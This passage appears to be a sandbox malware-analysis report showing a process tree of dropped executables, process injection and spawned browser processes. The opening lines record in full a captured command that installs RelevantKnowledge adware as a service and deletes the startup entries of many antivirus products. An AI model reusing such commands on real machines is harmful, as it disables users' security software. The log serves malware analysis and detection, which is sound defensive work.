"%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )
                                                                        5⤵
                                                                          PID:2208
                                                                  • C:\Users\Admin\Documents\nZTAvaJJHiZt8CpVom0PFy_o.exe
                                                                    "C:\Users\Admin\Documents\nZTAvaJJHiZt8CpVom0PFy_o.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:4344
                                                                    • C:\Users\Admin\Documents\nZTAvaJJHiZt8CpVom0PFy_o.exe
                                                                      C:\Users\Admin\Documents\nZTAvaJJHiZt8CpVom0PFy_o.exe
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      PID:2736
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2736 -s 1608
                                                                        4⤵
                                                                        • Program crash
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:4144
                                                                    • C:\Users\Admin\Documents\nZTAvaJJHiZt8CpVom0PFy_o.exe
                                                                      C:\Users\Admin\Documents\nZTAvaJJHiZt8CpVom0PFy_o.exe
                                                                      3⤵
                                                                        PID:2676
                                                                    • C:\Users\Admin\Documents\WnyJD1JNbEGRSLlBiKgWSQPQ.exe
                                                                      "C:\Users\Admin\Documents\WnyJD1JNbEGRSLlBiKgWSQPQ.exe"
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:4336
                                                                      • C:\Users\Admin\Documents\WnyJD1JNbEGRSLlBiKgWSQPQ.exe
                                                                        "C:\Users\Admin\Documents\WnyJD1JNbEGRSLlBiKgWSQPQ.exe"
                                                                        3⤵
                                                                        • Drops file in Drivers directory
                                                                        • Drops file in Program Files directory
                                                                        PID:6244
                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                          4⤵
                                                                            PID:7476
                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              PID:6388
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                            4⤵
                                                                            • Enumerates system info in registry
                                                                            PID:8080
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffd59ec4f50,0x7ffd59ec4f60,0x7ffd59ec4f70
                                                                              5⤵
                                                                                PID:7312
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1616 /prefetch:2
                                                                                5⤵
                                                                                  PID:4428
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1660 /prefetch:8
                                                                                  5⤵
                                                                                    PID:1660
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2108 /prefetch:8
                                                                                    5⤵
                                                                                      PID:8044
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2660 /prefetch:1
                                                                                      5⤵
                                                                                        PID:6300
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2668 /prefetch:1
                                                                                        5⤵
                                                                                          PID:6884
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
                                                                                          5⤵
                                                                                            PID:2932
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4372 /prefetch:8
                                                                                            5⤵
                                                                                              PID:7948
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4476 /prefetch:8
                                                                                              5⤵
                                                                                                PID:1008
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4960 /prefetch:8
                                                                                                5⤵
                                                                                                  PID:4504
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5228 /prefetch:8
                                                                                                  5⤵
                                                                                                    PID:2116
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2464 /prefetch:1
                                                                                                    5⤵
                                                                                                      PID:4008
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3644 /prefetch:1
                                                                                                      5⤵
                                                                                                        PID:8404
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1572 /prefetch:1
                                                                                                        5⤵
                                                                                                          PID:8720
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
                                                                                                          5⤵
                                                                                                            PID:9160
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5376 /prefetch:8
                                                                                                            5⤵
                                                                                                              PID:2336
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3252 /prefetch:8
                                                                                                              5⤵
                                                                                                                PID:3576
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4224 /prefetch:8
                                                                                                                5⤵
                                                                                                                  PID:1768
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:8
                                                                                                                  5⤵
                                                                                                                  • Enumerates system info in registry
                                                                                                                  PID:7676
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2692 /prefetch:1
                                                                                                                  5⤵
                                                                                                                    PID:2872
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5376 /prefetch:2
                                                                                                                    5⤵
                                                                                                                      PID:4840
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4988 /prefetch:1
                                                                                                                      5⤵
                                                                                                                        PID:1032
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4964 /prefetch:1
                                                                                                                        5⤵
                                                                                                                          PID:8400
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:1
                                                                                                                          5⤵
                                                                                                                            PID:7100
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4508 /prefetch:1
                                                                                                                            5⤵
                                                                                                                            • Drops file in Windows directory
                                                                                                                            • Modifies registry class
                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                            PID:4448
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4632 /prefetch:1
                                                                                                                            5⤵
                                                                                                                              PID:8548
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4192 /prefetch:1
                                                                                                                              5⤵
                                                                                                                                PID:1876
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2912 /prefetch:1
                                                                                                                                5⤵
                                                                                                                                  PID:8720
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4736 /prefetch:1
                                                                                                                                  5⤵
                                                                                                                                    PID:6828
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5808 /prefetch:8
                                                                                                                                    5⤵
                                                                                                                                      PID:6568
                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1360 /prefetch:8
                                                                                                                                      5⤵
                                                                                                                                        PID:6452
                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1360 /prefetch:8
                                                                                                                                        5⤵
                                                                                                                                          PID:5756
                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5716 /prefetch:8
                                                                                                                                          5⤵
                                                                                                                                            PID:8600
                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1588 /prefetch:8
                                                                                                                                            5⤵
                                                                                                                                              PID:9108
                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5324 /prefetch:8
                                                                                                                                              5⤵
                                                                                                                                                PID:3592
                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3184 /prefetch:8
                                                                                                                                                5⤵
                                                                                                                                                  PID:8124
                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5660 /prefetch:8
                                                                                                                                                  5⤵
                                                                                                                                                    PID:7416
                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4984 /prefetch:8
                                                                                                                                                    5⤵
                                                                                                                                                      PID:5060
                                                                                                                                                    • C:\Users\Admin\Downloads\NPE.exe
                                                                                                                                                      "C:\Users\Admin\Downloads\NPE.exe"
                                                                                                                                                      5⤵
                                                                                                                                                        PID:2752
                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6168 /prefetch:8
                                                                                                                                                        5⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:6312
                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1
                                                                                                                                                        5⤵
                                                                                                                                                          PID:9176
                                                                                                                                                        • C:\Users\Admin\Downloads\NPE.exe
                                                                                                                                                          "C:\Users\Admin\Downloads\NPE.exe"
                                                                                                                                                          5⤵
                                                                                                                                                            PID:7480
                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=856 /prefetch:1
                                                                                                                                                            5⤵
                                                                                                                                                              PID:2340
                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:1
                                                                                                                                                              5⤵
                                                                                                                                                                PID:7496
                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6136 /prefetch:1
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:7268
                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:8228
                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5648 /prefetch:8
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:8292
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5632 /prefetch:8
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:8816
                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:8456
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6232 /prefetch:8
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:9120
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6180 /prefetch:8
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:4148
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
